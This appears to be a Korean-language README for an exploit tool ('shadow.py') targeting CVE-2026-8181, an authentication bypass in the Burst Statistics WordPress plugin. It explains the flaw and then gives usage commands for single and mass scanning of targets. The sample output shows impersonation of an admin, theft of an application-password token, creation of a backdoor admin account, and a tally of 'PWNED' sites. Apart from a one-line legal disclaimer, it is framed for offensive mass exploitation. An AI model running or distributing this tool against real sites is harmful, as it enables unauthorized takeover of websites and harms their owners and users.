
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - 인증 우회를 통한 관리자 계정 탈취
Burst Statistics | 인증 우회를 통한 관리자 계정 탈취
Burst Statistics 3.4.0 - 3.4.1.1 - 인증 우회를 통한 관리자 계정 탈취
WordPress용 Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) 플러그인은 버전 3.4.0부터 3.4.1.1까지 인증 우회(Authentication Bypass) 취약점에 노출됩니다. 이는 Authorization 헤더의 애플리케이션 비밀번호를 검증할 때 is_mainwp_authenticated() 함수의 반환 값 처리 오류로 인해 발생합니다. 해당 함수는 대상 사용자에게 애플리케이션 비밀번호(Application Passwords)가 구성되어 있지 않으면 WP_Error가 아닌 null을 반환하는 wp_authenticate_application_password(null, $username, $password)를 호출합니다. 코드가 is_wp_error()만 검사하므로 wp_set_current_user() 호출로 계속 진행되어 공격자에게 해당 요청 전체에 대한 완전한 관리자 권한을 부여합니다.
이 우회는 플러그인 부트스트랩의 has_admin_access()를 통해 plugins_loaded(우선순위 9) 중에 트리거되며, 사용자 가장(user impersonation)이 WordPress REST API가 라우트를 디스패치하기 전에 발생하여 관리자 권한으로 모든 WP Core 엔드포인트(/wp/v2/users, /wp/v2/users/me 등)에 접근할 수 있게 됩니다.
이로 인해 인증되지 않은 공격자가 관리자 사용자 이름을 알고 있으면 임의의 Basic Authentication 비밀번호를 제공하여 해당 관리자를 가장할 수 있으며, 완전한 권한 상승과 관리자 계정 탈취를 달성할 수 있습니다.
~ CVSS 점수: 9.8 (치명적)
~ CVSS 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ 영향을 받는 버전: 3.4.0 - 3.4.1.1
~ 패치 버전: 3.4.2
단일 대상 :
python3 shadow.py -u https://target.com사용자 이름을 알고 있는 단일 대상 :
python3 shadow.py -u https://target.com -U admin대량 대상 :
python3 shadow.py -f targets.txt -t 20대화형 모드 :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
소유하지 않았거나 테스트 권한이 없는 시스템의 무단 사용은 불법입니다.